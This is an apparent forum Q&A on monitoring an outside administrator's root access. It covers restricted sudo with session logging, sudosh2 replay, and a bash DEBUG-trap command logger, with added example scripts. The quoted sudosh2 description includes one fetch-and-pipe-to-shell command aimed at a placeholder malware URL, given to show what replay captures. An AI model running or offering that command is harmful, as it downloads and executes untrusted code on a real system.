I want to give access to my root server to an external system administrator, but I want to be sure to double-check what he is doing to my server, e.g. copying data I don't want him to copy, and so on. I would also like to keep track of whatever file is accessed, even if it is only read and not edited.
How can I do that?
Don't give him root access. Instead, give him an unprivileged user account and request that he do all of his work through sudo, which will log all of his commands. Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.
Trust, but verify!
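As an added example (not code from the answer above), the following script generates a least-privilege sudoers drop-in of the kind the answer recommends and checks it with visudo. The account name extadmin, the allowed command list and the log paths are placeholders chosen for this example; the sudo options used (Cmnd_Alias, Defaults logfile, log_input, log_output, iolog_dir) are sudo's own.

```shell
#!/bin/sh
# Added example, not code from the answer above: generate a least-privilege
# sudoers drop-in for an external administrator and validate it with visudo.
# The account name "extadmin", the command list and the log paths are
# placeholders chosen for this example.

# Print the drop-in text for USER, allowing only the comma-separated CMDS.
# sudo's log_input/log_output options record the whole session (keystrokes
# and output) for later review with sudoreplay, which covers what a plain
# command log would miss inside an allowed interactive program.
make_sudoers_dropin() {
    user=$1
    cmds=$2
    printf '%s\n' \
        "# Commands the external admin may run via sudo; nothing else" \
        "Cmnd_Alias EXTADMIN_CMDS = $cmds" \
        "" \
        "# Log every invocation and record full terminal I/O of each session" \
        "Defaults:$user logfile=/var/log/sudo-extadmin.log" \
        "Defaults:$user log_input, log_output" \
        "Defaults:$user iolog_dir=/var/log/sudo-io" \
        "" \
        "$user ALL=(root) EXTADMIN_CMDS"
}

# Write the drop-in to PATH with the 0440 mode sudo expects for sudoers files.
write_dropin() {
    make_sudoers_dropin "$1" "$2" > "$3" || return 1
    chmod 0440 "$3"
}

# Check a drop-in with visudo. Prints "ok", "rejected" (syntax error, or an
# owner/mode complaint when run as a non-root user) or "skipped" when visudo
# is not installed; returns non-zero only when visudo rejects the file.
check_dropin() {
    if ! command -v visudo >/dev/null 2>&1; then
        echo skipped
        return 0
    fi
    if visudo -cf "$1" >/dev/null 2>&1; then
        echo ok
    else
        echo rejected
        return 1
    fi
}

# Usage with constructed values; on a real host the file would go under
# /etc/sudoers.d/ and be checked there before the account is handed over.
dropin="${TMPDIR:-/tmp}/extadmin.sudoers"
write_dropin extadmin "/usr/bin/systemctl restart nginx, /usr/bin/journalctl" "$dropin"
check_dropin "$dropin"
```

The command list is the part that needs thought: anything that can spawn a shell or open arbitrary files (editors, pagers, interpreters) turns a restricted sudoers line back into full root, which is why the answer says to grant only the specific commands the job needs. The log_input/log_output session recording is what lets you verify what happened inside the commands you did allow.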
Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:
Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything: keystrokes, typos, backspaces, what they edited in vi, the output of wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh, etc. It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.
Note that sudosh2 is a replacement for sudosh, which was abandoned by its author.
Do you work at an academic institution where users insist on having superuser privileges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.
I'm not familiar with sudosh2, but I put the following in my .bashrc to log all the commands I type in a bash shell to the file ~/.command_log:

The above sets a trap on DEBUG, which is executed just before an ordinary command is executed. The caller built-in is used to test whether the command is being typed at an interactive shell or run via something like .bashrc. The value ${BASH_COMMAND} contains the command currently being executed.
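The following is an added example of the DEBUG-trap approach the answer describes; it is not the answer's own .bashrc snippet (which this page does not reproduce). The log path, helper names and tab-separated line format are choices made for this example, and the interactive-versus-sourced test uses BASH_SOURCE rather than the caller builtin the answer mentions.

```shell
#!/usr/bin/env bash
# Added example, not the answer's own .bashrc snippet: log every command typed
# at an interactive bash prompt to a per-user file via a DEBUG trap. The log
# path, helper names and tab-separated line format are choices made for this
# example; the interactivity test uses BASH_SOURCE instead of caller.

COMMAND_LOG="${COMMAND_LOG:-$HOME/.command_log}"

# One log line: UTC timestamp, user, working directory, command (tab-separated,
# so a directory name containing spaces does not break later parsing).
format_command_entry() {
    printf '%s\t%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(id -un)" "$PWD" "$1"
}

# Append an entry for the command in $1. The file is created owner-readable
# only; empty commands and the PROMPT_COMMAND itself (for which the DEBUG trap
# also fires, before every prompt) are skipped so the log is not flooded.
log_command() {
    cmd=$1
    [ -n "$cmd" ] || return 0
    if [ "$cmd" = "${PROMPT_COMMAND:-}" ]; then
        return 0
    fi
    if [ ! -e "$COMMAND_LOG" ]; then
        ( umask 077; : > "$COMMAND_LOG" ) || return 1
    fi
    format_command_entry "$cmd" >> "$COMMAND_LOG"
}

# Count entries whose command field equals $1 exactly; a small helper for
# reviewing the log (e.g. how often a given command was run).
count_logged() {
    [ -e "$COMMAND_LOG" ] || { echo 0; return 0; }
    awk -F '\t' -v want="$1" '$4 == want { n++ } END { print n + 0 }' "$COMMAND_LOG"
}

# Install the trap only in an interactive bash shell. When the trap fires,
# BASH_SOURCE is empty for a command typed at the prompt and non-empty while a
# file such as .bashrc is being sourced, which is the distinction the answer
# draws with caller. Inside the trap, BASH_COMMAND still names the user's
# command. The if-form keeps the trap's exit status zero when nothing is
# logged, so the command is never skipped under shopt extdebug.
if [ -n "${BASH_VERSION:-}" ]; then
    case $- in
        *i*) trap 'if [ "${#BASH_SOURCE[@]}" -eq 0 ]; then log_command "$BASH_COMMAND"; fi' DEBUG ;;
    esac
fi
```

Sourced from .bashrc, this records each command as it is entered, including ones that never reach the history file. Since the log lives in the user's own home and the user controls the shell (trap - DEBUG, a different shell, or editing the file all defeat it), it is a convenience record for someone you already trust, not the verification the question asks for; for that, the sudo logging and remote syslog described in the other answers are what hold up.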